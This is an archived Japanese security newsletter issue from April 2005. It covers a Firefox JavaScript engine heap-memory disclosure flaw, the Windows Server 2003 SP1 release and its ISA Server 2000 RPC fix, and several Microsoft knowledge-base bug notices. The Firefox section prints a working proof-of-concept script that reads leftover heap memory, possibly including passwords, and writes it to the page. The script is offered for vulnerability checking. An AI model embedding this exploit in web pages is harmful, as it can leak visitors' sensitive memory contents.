[HotFix Report 2005/04/06］不具合／追加情報

このページは、HotFix Reportで配信されたセキュリティ情報のバックナンバーです。「更新日」に明記された時点での情報ですのでご注意ください。ご購読の申し込みは「HotFix Report購読の申し込み」をご参照ください。

更新日：2005/04/06

不具合ならびに追加情報

情報の種類	セキュリティ番号	タイトル
脆弱性	－／－	FirefoxのJavaScriptエンジンの脆弱性により、情報が漏えいする危険性
SP	－／－	英語版Windows Server 2003 SP1の提供開始
不具合	－／－	そのほかの不具合情報

［脆弱性］

HotFix Alert：

－

セキュリティ番号：

－

サポート技術情報：

－

FirefoxのJavaScriptエンジンの脆弱性により、情報が漏えいする危険性

情報ソース	Azafran氏（C.U.B.I.C.）、Secunia
情報の内容	FirefoxのJavaScriptエンジンの脆弱性
条件	Firefoxの利用
報告日	2005年4月1日

　Azafran氏は、FirefoxのJavaScriptエンジンに脆弱性が存在し、メモリの内容が漏えいしてしまう危険性があることを報告した。この脆弱性は、JavaScriptエンジンがヒープ・メモリを拡大し、本来はアクセスできないメモリ領域にアクセスできてしてしまうことに起因する。場合によっては、メモリ内に残っているパスワードなどが漏えいしてしまう危険性がある。

・C.U.B.I.C.（Azafran氏の投稿）：
http://cubic.xfo.org.ru/index.cgi?read=53004

　Azafran氏はすでに実証コードを公開しているため、悪用される危険性もある。またAzafran氏の実証コードを元に、Secuniaでも実証コードを公開している。DA Labでこれらの実証コードを試したところ、Firefox 1.0.2にも脆弱性が存在することを確認した。またInternet Explorerには脆弱性が存在しないことも確認できた。

・Secunia（Mozilla Firefox JavaScript Engine Information Disclosure Vulnerability）：
http://secunia.com/advisories/14820/

・Secunia（Mozilla Products Arbitrary Memory Exposure Test）：
http://secunia.com/mozilla_products_arbitrary_memory_exposure_test/

　現在のところMozilla Foundationからこの脆弱性に関する正式な報告や修正プログラムの提供は行われていない（Bugzillaですでに対策についての検討が行われている）。回避策は、FirefoxでのJavaScriptを無効化すること（［ツール］－［オプション］－［Web機能］で「JavaScriptを有効にする」のチェックを外す）。

・Bugzilla（JS "lambda" replace exposes malloc heap space after end of JS string）：
https://bugzilla.mozilla.org/show_bug.cgi?id=288688

　なお以下が公開されている実証コードをベースに作成したものだ。脆弱性の有無の確認に利用していただきたい。

<script language="JavaScript">

function genGluck(str){ var x = str; var rx=/end/i; x = x.replace(rx,function($1){ $1.match(rx); return ""; }); x = x.replace(/^end/,""); return x; }

var mem = genGluck( "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"+ "XXXend");

mem = mem.replace(/[^\.\\\:\/\'\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " "); document.write(mem);

情報の対象：
　Firefox 1.x

［SP］

HotFix Alert：

－

セキュリティ番号：

－

サポート技術情報：

－

英語版Windows Server 2003 SP1の提供開始

情報ソース	Microsoft
情報の内容	Windows Server 2003 SP1の提供開始
条件	Windows Server 2003の利用
報告日	2005年3月30日

　Microsoftは、3月30日に英語版とドイツ語版のWindows Server 2003 SP1の提供をダウンロード・センターとWindows Updateで開始した。4月4日時点では日本語版は提供されていない（4月上旬に提供予定）。

・ダウンロード・センター（Microsoft Windows Server 2003 Service Pack 1 (32 bit)）：
http://www.microsoft.com/downloads/details.aspx?
familyid=22CFC239-337C-4D81-8354-72593B1C1F43&displaylang=en

　Windows Server 2003 SP1では、Windows Server 2003の提供後にリリースされたセキュリティ修正プログラムや不具合の修正を一括して適用できることに加え、以下のようなセキュリティの強化が行われる。ただしこれらのセキュリティ機能強化などに伴い、一部のアプリケーションでは互換性問題を生じる可能性もある。適用にあたっては、事前検証を十分に行っていただきたい。

データ実行防止（DEP）（バッファ・オーバーランの抑止など）
リモート・アクセス検疫制御（条件を満たさないリモート・クライアントは接続を拒否する）
Windows XP SP2で導入されたWindows ファイアウォール機能のサポート（既定では無効）
セキュリティの構成ウィザードのサポート（サーバの役割に応じて対話的なセキュリティ設定を可能にする）
セットアップ後のセキュリティ更新（更新直後の修正適用時のネットワーク接続を保護する）

・マイクロソフト（Windows Server 2003 Service Pack 1 の製品概要）：
http://www.microsoft.com/japan/windowsserver2003/
downloads/servicepacks/sp1/overview.mspx

■Windows Server 2003 SP1適用によるISA Server 2000への影響
　Windows Server 2003 SP1では、RPCサービスに変更が加えられている。そのため、Windows Server 2003 SP1を実行しているコンピュータへのRPCアクセスはISA ServerのRPCフィルタによって拒否される。この互換性問題を解消するための、ISA Server 2000向けの修正プログラムが提供されている。Windows Server 2003とISA Server 2000を利用している場合は、Windows Server 2003 SP1の適用時に、ISA Server 2000向けの修正プログラムも適用するとよい。

・ダウンロード・センター（Windows Server 2003 Service Pack 1 用の Microsoft Internet Security and Acceleration (ISA) Server 2000 RPC フィルタの更新プログラム）：
http://www.microsoft.com/downloads/details.aspx?
FamilyID=678cdcb6-6f05-45c0-acfa-d8e3774b8e9c&DisplayLang=ja

情報の対象：
　Windows Server 2003

関連HotFix Report BBS関連スレッド：
・SP1 による RPC の仕様変更に合わせて、ISA 2000 向け修正プログラムが登場
http://bbs.hotfix.jp/ShowPost.aspx?PostID=2684

■そのほかの不具合／追加情報

・サポート技術情報 896648（セキュリティ更新プログラム 873333 （MS05-012）のインストール後 svchost.exe エラーが発生することがあります）：［Windows 2000］［Windows XP］［Windows Server 2003］
http://support.microsoft.com/default.aspx?scid=kb;ja;896648

・サポート技術情報 897041（配信確認、開封確認メッセージの結果が重複して表示される）：［Office Outlook 2003］
http://support.microsoft.com/default.aspx?scid=kb;ja;897041

・サポート技術情報 896972（一太郎で作成した文書を Word で開いた場合、一太郎文書コンバータダイアログが表示される）：［Word 2003］
http://support.microsoft.com/default.aspx?scid=kb;ja;896972

・サポート技術情報 885222（Windows XP Service Pack 2 のインストール後、1394 デバイスのパフォーマンスが低下することがある）：［Windows XP SP2］
http://support.microsoft.com/default.aspx?scid=kb;ja;885222
http://www.microsoft.com/downloads/details.aspx?
FamilyID=ca0f2007-18b5-4112-8bd6-8bf4bd3130b9&DisplayLang=ja
＃更新版修正プログラムの提供開始（置き換えるファイルのバージョンは変更なし）

・サポート技術情報 841561（ユーザーがクラスタ化された Exchange Server 2003 バックエンドサーバーに Outlook Web Access を使用すると、アクセスしようとすると、「 500 内部サーバーエラー」エラーメッセージ）：［Exchange Server 2003］
http://support.microsoft.com/default.aspx?scid=kb;ja;841561［機械翻訳］
http://www.microsoft.com/downloads/details.aspx?
FamilyID=050be883-11fc-4045-b988-c737e79c65d0&DisplayLang=ja
＃修正プログラムの提供開始

UpdateEXPERTは、管理者の負担を大幅に軽減するHotFix管理ツールです。
HotFix Reportは、UpdateEXPERTユーザー向けの情報を含んでいます。UpdateEXPERTに関する詳細ならびにお問い合わせは、アップデートテクノロジー株式会社のホームページをご参照ください。

Copyright (C) Digital Advantage Corp.
このメールは、HotFix Reportにご登録いただいておりますユーザー様にお送りしています。
無断で複製・再配信などを行うことはできません。このメールに関する問い合わせ先：info@hotfix.jp
HotFix Reportでは、細心の注意を払って情報提供を行っておりますが、本サービスにおける情報の正確性、最新性、適切性などについて、明示的又は黙示的な保証を行いません。また本サービスの停止や欠陥、それらに起因して発生する損失や損害について、一切責任を負いません。